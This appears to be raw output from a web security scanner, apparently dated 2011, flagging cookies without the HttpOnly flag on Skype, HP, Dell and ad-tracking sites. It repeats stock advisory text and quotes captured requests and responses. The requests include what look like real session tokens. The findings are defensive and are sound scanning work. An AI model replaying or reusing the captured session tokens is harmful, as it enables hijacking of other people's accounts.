Content-Type: text/html; charset=utf-8
Content-Language: en
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.115./en/go/prices HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: ui.skype.com
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170817:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0
Response
HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:14:10 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170850:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-12 21:14:10 GMT; path=/; domain=.skype.com;
Location: http://www.skype.com/go/prices
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.115./en/go/share HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: ui.skype.com
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; VISITORID=1344388383; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824
Response
HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:13:37 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170817:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-12 21:13:37 GMT; path=/; domain=.skype.com;
Location: http://www.skype.com/go/share?SkypeName=&FriendEmailAddr_1=&FriendEmailAddr_2=&FriendEmailAddr_3=&FriendEmailAddr_4=&FriendEmailAddr_5=&FriendEmailAddr_6=&FriendName_1=&FriendName_2=&FriendName_3=&FriendName_4=&FriendName_5=&FriendName_6=
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.115./en/go/subscriptions?country= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: ui.skype.com
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170850:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0
Response
HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:27:02 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:E70B9EF1770AF398=:LC=en-us:TM=1315171622:TS=1315171562:TZ=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-12 21:27:02 GMT; path=/; domain=.skype.com;
Location: http://www.skype.com/go/subscriptions?cm_mmc=Skype-_-Dynamic_Content-_-Subscriptions-_-Generic4
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie header.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=76c8d7f07f77d55df225a1ee0abb; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookies were issued by the application and do not have the HttpOnly flag set:
PHPSESSID=mgd0vgc60sr4gk9t1ql92arlu3; path=/
server=www18; path=/
The PHPSESSID cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cda/gap/display/main/index.jsp HTTP/1.1
Host: h10088.www1.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /campus/p/campusId/10640/Graphic_arts.htm HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /howto_QL_courses.jsp?contentType=How-to+in+2&mcid=explore-create HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.jsp HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /password-reset-request?setlang=en&intsrc=client%7Cforgot-pword HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0
Host: login.skype.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jspix?anId=144&pubId=19240&campId=161441 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B600F18284A9B6B8956E4E27118E3C99; Path=/
Content-Type: text/javascript
Date: Mon, 05 Sep 2011 02:30:54 GMT
Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824
Host: support.skype.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shared_components/javascript/launchDemoStage3PlayerClient_js.asp HTTP/1.1
Host: www.demosondemand.com
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function launchDemoStage3Player(session_id, promotion_id,startTime,reseller_id ) { var initialW = 250; var initialH = 200; var x = (screen.width/2)-initialW/2; var y ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forums/houlihan-lokey-exit-opps HTTP/1.1
Host: www.wallstreetoasis.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /media/redir.php?prof=6&camp=4190&affcode=kw93350&cid=7516966884&networkType=search&k_clickid=AMS|_kenshoo_clickid_&url[]=https%3A%2F%2Fh41183.www4.hp.com%2Finflexion%2F%3Fcountry%3DUS%26language%3DUS%26campaigncode%3Dinflexion%26jumpid%3Dinflexion HTTP/1.1
Host: 142.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 16:18:39 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564; expires=Sat, 03-Dec-2011 16:18:39 GMT; path=/; domain=.xg4ken.com
Location: https://h41183.www4.hp.com/inflexion/?country=US&language=US&campaigncode=inflexion&jumpid=inflexion&k_clickid=AMS|200d2a28-23e9-a048-8372-00005235d564
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/DellPartsFamily.aspx HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 76867
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:06 GMT; path=/
Set-Cookie: StormSCookie=bandwidth=NA&js=1&flashversion=10; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:05 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Dell C ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/ShopAllBrands.aspx HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 165178
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:26 GMT; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:25 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Shop B ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/batteryconfig.aspx?c=us&cs=04&l=en&s=bsd HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23838
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:19 GMT; path=/
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:18 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Batter ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/category.aspx?category_id= HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: StormSCookie=~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
Set-Cookie: lwp=c=us&l=en&s=dhs&cs=19; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:14 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Electr ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/category.aspx?c=us&l=en&s=dhs&category_id=5914&cs=19 HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 122314
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|dhs|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:18 GMT; path=/
Set-Cookie: StormPCookie=bandwidth=NA&js=1&rpo_snp=A4186752,A4186751,A4186750; domain=.dell.com; expires=Sat, 04-Sep-2021 16:29:19 GMT; path=/
Set-Cookie: lwp=c=us&l=en&s=dhs&cs=19; domain=.dell.com; path=/
Set-Cookie: StormSCookie=~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:19 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>TVs - ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/default.aspx?c=us&l=en&cs=04 HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 88780
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:31 GMT; path=/
Set-Cookie: StormPCookie=bandwidth=NA&js=1&rpo_snp=320-2676,320-9511,320-1748,320-9321; domain=.dell.com; expires=Sat, 04-Sep-2021 16:29:31 GMT; path=/
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:30 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Comput ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/memconfig.aspx HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30746
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:58 GMT; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:58 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Comput ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/printersupplies.aspx?c=us&cs=04&l=en&s=bsd&seg=bsd&step=4&~ck=mn HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 34551
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:22 GMT; path=/
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: StormSCookie=~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:22 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Printe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sna/productdetail.aspx HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 149
Content-Type: text/html; charset=utf-8
Location: /sna/productnotfound.aspx?
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:44 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:44 GMT
Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fsna%2fproductnotfound.aspx%3f">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/sna.aspx?c=us&cs=04&l=en&s=bsd&~topic=printer_shopall_inkjets&~ck=mn&~ck=mn HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 53137
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:25 GMT; path=/
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:25 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Shop a ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/English/ct-p/English?profile.language=en HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0
Host: community.skype.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
HUBSPOT159=152114348.0.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /salog.js.aspx HTTP/1.1
Host: cymphonix.app3.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.cymphonix.com/2011-shaping-demo-sem.html?utm_campaign=2011-Q1-Web-AdWords&utm_source=AdWords&utm_content=7-Minute-Demo&gclid=CPr6tJD_g6sCFQo0QgodKw5i0g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var hsUse20Servers = true; var hsDayEndsIn = 42078; var hsWeekEndsIn = 42078; var hsMonthEndsIn = 2288478; var hsAnalyticsServer = "tracking.hubspot.com"; var hsTimeStamp = "2011-09-04 12:18: ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
90379962_reset=1315153064;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /imp?tid=17&ci=90379962&vn1=4.1.1&vn2=imp&ec=UTF-8&cm_mmc=Wall%20Street%20Journal%20US%20%28WSJ%29-_-2011%20Frost%20Online-_-Business%20Package-_-fro11157_phase2_savings_300x600_v1 HTTP/1.1
Host: data.cmcore.com
